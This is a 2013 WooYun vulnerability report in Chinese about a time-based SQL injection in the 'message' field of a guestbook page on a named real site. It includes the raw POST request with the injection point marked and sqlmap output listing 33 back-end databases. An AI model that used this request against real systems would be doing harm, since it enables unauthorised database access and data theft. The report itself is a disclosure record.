我们都是好孩子##好孩子育儿网某站post注入导致可以畅游各个管理系统 | wooyun-2013-041263

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2013-041263

漏洞标题：

我们都是好孩子##好孩子育儿网某站post注入导致可以畅游各个管理系统

漏洞详情

披露状态：

2013-10-28：细节已通知厂商并且等待厂商处理中
2013-11-02：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

我们都是好孩子，异想天开的孩子......
我们都是好孩子，最最善良的孩子......

详细说明：

漏洞网站：http://tcdrp.gb246.com/

post信息：

POST /guestbook.asp HTTP/1.1
Content-Length: 152
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDACDBSBDC=CHDHIJDCGJNKLBCEBHANDECK
Host: tcdrp.gb246.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
message=*

message存在注入

漏洞证明：

available databases [33]:
[*] [mkpos-zy004]
[*] ADFSADFSADF
[*] BindDB
[*] BranchDHH
[*] BranchDHH_JH201303
[*] BranchDHH_JS201302
[*] BranchDHH_SH201301
[*] BranchDHH_SH201306
[*] DrpCenterTCHZData
[*] DrpCenterTCHZSys
[*] DrpCenterZDSNSys
[*] DrpCenterZSM0521Data
[*] DRPCenterZSMData
[*] DrpCenterZTC0306Sys
[*] DrpCenterZTC0521Data
[*] DrpCenterZTC0715sys111
[*] DrpCenterZTC0813Sys
[*] DrpCenterZTC0822Sys
[*] DrpCenterZTCData
[*] DrpCenterZTCSys
[*] master
[*] model
[*] msdb
[*] TCHZDATA20120920
[*] TCHZSYS20120920
[*] tempdb
[*] Test
[*] TMPOSDB
[*] TMPOSDB201110
[*] TMPOSDB201204
[*] TMPOSDB201205
[*] TMPOSDB201210
[*] ZSM1202241
[06:18:34] [INFO] fetched data logged to text files under '/root/sqlmap/output/tcdrp.gb246.com'

由于是基于时间的注入，服务器影响不好，就不再看了。

修复方案：

如果所以的管理系统的数据都在一起，那就悲剧了，相当与我可以畅游所有的管理系统了。
危害就不多说了。

版权声明：转载请注明来源 PgHook@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2013-11-02 12:48

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 PgHook@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 PgHook@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞